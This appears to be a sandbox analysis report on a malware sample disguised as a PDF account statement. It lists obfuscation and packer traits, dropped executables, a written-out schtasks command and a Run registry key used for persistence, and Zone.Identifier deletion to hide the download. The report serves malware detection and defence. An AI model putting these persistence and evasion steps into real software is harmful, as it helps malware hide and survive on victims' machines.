                      Source: Binary string: System.Data.pdb, source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 0.2.Statement of Account PDF.bat.exe.3949970.2.raw.unpack, V4uC3Iifq56IKQcfry.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.Statement of Account PDF.bat.exe.7600000.7.raw.unpack, V4uC3Iifq56IKQcfry.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      .NET source code contains potential unpacker
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, Dr83W1h4x8JWr6EBI0.cs.Net Code: O3Bxfh3Ehd System.Reflection.Assembly.Load(byte[])
                      Source: Statement of Account PDF.bat.exeStatic PE information: 0x9CBFCD6A [Fri May 2 16:20:58 2053 UTC]
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_07625534 pushfd ; retf 0_2_0762555F
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_06CC7E88 pushad ; iretd 0_2_06CC7E91
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_06CCFF58 push ebx; retf 0_2_06CCFF6A
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_06CE055C pushfd ; retf 0_2_06CE055D
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_06CE5ABB pushad ; retf 0_2_06CE5ACF
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_06CE8AB8 pushad ; retf 0_2_06CE8AC6
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 0_2_074A3E3A push ds; ret 0_2_074A3E3B
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 8_2_0101F04E push eax; retf 0594h8_2_0101F085
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 8_2_01010C3D push edi; ret 8_2_01010CC2
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeCode function: 8_2_01010C95 push edi; retf 8_2_01010C3A
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_068F7E88 pushad ; iretd 10_2_068F7E91
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06A16471 push es; ret 10_2_06A16480
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06A1BB71 pushad ; retn 0006h10_2_06A1BB72
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06D33E3A push ds; ret 10_2_06D33E3B
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06ED7D50 push eax; ret 10_2_06ED7D51
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 10_2_06ED8998 pushad ; retf 10_2_06ED8999
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 15_2_01400C3D push edi; ret 15_2_01400CC2
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeCode function: 15_2_01400C95 push edi; retf 15_2_01400C3A
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_07403E3A push ds; ret 18_2_07403E3B
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_07647E0A pushfd ; ret 18_2_07647E11
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_07647D50 push eax; ret 18_2_07647D51
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_076489E8 pushfd ; retf 18_2_076489F1
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_07648998 pushad ; retf 18_2_07648999
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_01640B4D push edi; ret 22_2_01640CC2
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_0164AA28 pushfd ; iretd 22_2_0164AA29
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_01640C95 push edi; retf 22_2_01640C3A
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_07041658 push cs; retf 22_2_0704165B
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_070474B8 push esp; iretd 22_2_070474C1
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06FF7E0B pushfd ; ret 25_2_06FF7E11
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06FF7D50 push eax; ret 25_2_06FF7D51
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06FF89E8 pushfd ; retf 25_2_06FF89F1
                      Source: Statement of Account PDF.bat.exeStatic PE information: section name: .text entropy: 7.953860448849022
                      Source: gDdsxauPhk.exe.0.drStatic PE information: section name: .text entropy: 7.953860448849022
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, Dr83W1h4x8JWr6EBI0.csHigh entropy of concatenated method names: 'SjpioJ9awJ', 'ea8iZ4gqug', 'MECi3HoQTF', 'UUHid4MrLo', 'WOCiBxwBPw', 'L4wiVOrOuJ', 'k9di7KbRoO', 'Ejbih30AsW', 'vJ6iLVQmpQ', 'Rpbiu8EQoF'
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, f9AEeM92i5mlZ4Aopi.csHigh entropy of concatenated method names: 'meFr6pyr5u', 'nHfrc9nAMw', 'lyWrssknHt', 'hH1rTnCNwj', 'DxUry1RSU1', 'Jqerb3RYy2', 'nBcrEnR9wl', 'UVorgZPqUS', 'Q4IrHKnd23', 'OnArUCyYnv'
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, XhKCd9dHf21VeCLFyn.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wvXOmwRH8f', 'VwwOtZWtA0', 'BGCOzMrrx1', 'EwHi15WSlf', 'rx8i0akpVm', 'mF8iOqeqbQ', 'ySeiiBBgPv', 'PuCjFBPpf1uYIhfEx86'
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, rX6SQY6VW0eXSFLNTj.csHigh entropy of concatenated method names: 'dba3NyVIOh', 'kiY3PSBMu4', 'P6m3wY9Mhj', 'DPw32EjX88', 'M4W3vH9siM', 'Hg33JUdnOW', 'zlD3nwLFrY', 'qWJ35l50Xx', 'y0e3mosY2b', 'fIT3tg1x6r'
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, UtFFE8xFLtnRoEVa8X.csHigh entropy of concatenated method names: 'uiR07X6SQY', 'iW00heXSFL', 'wq90uMrTF4', 'rc70FTjdtm', 'tCm0GAKNXx', 'X2v0jjygSG', 'F7FIS9F3ktykQm0QfM', 'sf1PNNkxfOGfgslpEU', 'sUO00I1DK7', 'dFK0iI4nCn'
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, pdtmeyKGkFH3nSCmAK.csHigh entropy of concatenated method names: 'mjlBQWpSiX', 'LSkBpBUDRn', 'OkddkvB3lt', 'i61dyQIJrg', 'Bv3db0G7Xe', 'yO7dlG4HCZ', 'Ok9dEUNjxh', 'ClddgMT05Z', 'cNQd8G3GCV', 'x0UdHEfXvt'
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, Q0vt0hOSjo6HIj4Rq3.csHigh entropy of concatenated method names: 'wpaf5LLQ0', 'rxh4vk4J8', 'JJGIEh9jY', 'au8pi5SHf', 'jY0c0NTgk', 'QI3KLHWb7', 'fqD0V8SHmRenCUnAeq', 'BibAuLQfThhaKeeF73', 'jhhaiH8LJ', 'A0VSXwA2K'
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, xIbxFy8gOG4vjPPpTX.csHigh entropy of concatenated method names: 'Gto7DJUvE5', 'kyU7MG2yt4', 'ueO7fLuqhw', 'Boe74jeRuo', 'VLc7QVDYbq', 'K4u7I5buHj', 'GXk7pGLnWU', 'Lu576g7QMj', 'SwY7cWldwg', 'AnK7K6FSGv'
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, eZfufPmGb7N5B4W3Lm.csHigh entropy of concatenated method names: 'gr3asZTftr', 'SSMaTXr7In', 'NHgakd9eEU', 'xpFayH9wD2', 'tJjaNp49l4', 'fbrabuxhf7', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, KisC0xzkcjhkuYQIwX.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xCgRrVPMPl', 'xsDRGQ8Z3s', 'MoLRjGgEtM', 'oTwRq8BkKA', 'IN7RagxPns', 'mrIRRxq2Rw', 'AI4RSn3XqL'
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, g6ofiB57OeE53f5hFC.csHigh entropy of concatenated method names: 'Hr0aZ6pF48', 'vGga3CDhix', 'HGOad6QrhT', 'fqxaBkLrL9', 'M9MaVqctgg', 'h7ta7RpXFY', 'acjah2vvV9', 'v4YaLiL33q', 'inhauehEfJ', 'I0LaFHn3Ua'
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, RXxm2vsjygSGRy8oEp.csHigh entropy of concatenated method names: 'Hj0VoApRBd', 'EpXV3Is6y8', 'BX9VBTBBu1', 'Ps3V7KUEru', 'wf7VheH1aX', 'SANBveSRtM', 'x0nBJvCC2E', 'P3bBnFsEHh', 'usJB5ZqZbY', 'aheBmZjrRF'
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, WAm6g4lQKCsssNesbm.csHigh entropy of concatenated method names: 'G2SVwBKVmZ', 'FPAV25sjvh', 'YIJVvELQ20', 'ToString', 'zvcVJ011XC', 'g9hVnpffxq', 'kuKb8h1cDGGL8kkENXo', 'wTsqAw1i6GFNdUC3se7'
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, TbdHuRwIDNx36coOJj.csHigh entropy of concatenated method names: 'ToString', 'lstjUjAc0x', 'W3OjT3yVrG', 'Ohsjk9YJ4f', 'AF8jyv1cB5', 'TgLjbjODMF', 'GxKjl7KjOg', 'Kg9jENfd3j', 'o1AjgS7dF6', 'VqFj8ARHuM'
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, TQUTGR01T6mTBxIIcxc.csHigh entropy of concatenated method names: 'XK6RDu5MTi', 'V6IRMuKAU5', 'kVaRfPSMyQ', 'my3R4anKEs', 'DuPRQuvfoD', 'AjXRId9MqP', 'IwfRpFS6oN', 'uB6R6LdJEW', 'JbbRcsrFkT', 'feFRKAI8YS'
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, ENrO1Acq9MrTF4Rc7T.csHigh entropy of concatenated method names: 'Br1d4U2XNV', 'D7LdIiYElt', 'Pqad6dvGmT', 'cVudcxCHRi', 'qdDdGhKOXv', 'CQpdjAafLZ', 'l0jdqy1fFL', 'XK9daQCAto', 'aSRdRjfgZS', 'TDSdSgfZSC'
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, lG6NYlJTADKPBmgkWy.csHigh entropy of concatenated method names: 'wKZq5ZmjUG', 'cnUqtNQIAH', 'L2Wa1YIipr', 'gPea02c2kb', 'J6TqUnHsnP', 'SJBqCOEjKH', 'PmCq9nNn9W', 'GauqNG66D2', 'SeTqPGG8ZJ', 'qkQqwsd87W'
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, NBhtei0i2kd7O8CGNMg.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KPgSN9EkJV', 'doRSPlPd0u', 'zN8Sw6ThTq', 'zPIS2BVR5X', 'wxlSvNJdsb', 'znhSJC20vq', 'GlpSnIyIFR'
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, k3txY0tGWeAPhqr1oN.csHigh entropy of concatenated method names: 'W33R05dTbP', 'oLhRiPXw7K', 'HGURx9iVLc', 'nhjRZRETq3', 'hHCR3w8nvn', 'pvLRBNxFie', 'uaERVPPIZ7', 'bG9anCyrQF', 'lj5a5OckWd', 'U7bamkHuow'
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, PuRLoy3ScatIm3wqH1.csHigh entropy of concatenated method names: 'Dispose', 'wDp0mZmijB', 'MRKOTudN99', 'crtHHIUsxe', 'cd60tofiB7', 'beE0z53f5h', 'ProcessDialogKey', 'mCoO1ZfufP', 'ob7O0N5B4W', 'fLmOOh3txY'
                      Source: 0.2.Statement of Account PDF.bat.exe.3949970.2.raw.unpack, V4uC3Iifq56IKQcfry.csHigh entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
                      Source: 0.2.Statement of Account PDF.bat.exe.3949970.2.raw.unpack, vpednoN8EZgsJ4TDwx.csHigh entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
                      Source: 0.2.Statement of Account PDF.bat.exe.7600000.7.raw.unpack, V4uC3Iifq56IKQcfry.csHigh entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
                      Source: 0.2.Statement of Account PDF.bat.exe.7600000.7.raw.unpack, vpednoN8EZgsJ4TDwx.csHigh entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeFile created: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeJump to dropped file
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeFile created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeJump to dropped file

                      Boot Survival

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp690.tmp"
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BjTxJteJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BjTxJteJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeFile opened: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeFile opened: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe:Zone.Identifier read attributes | delete
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
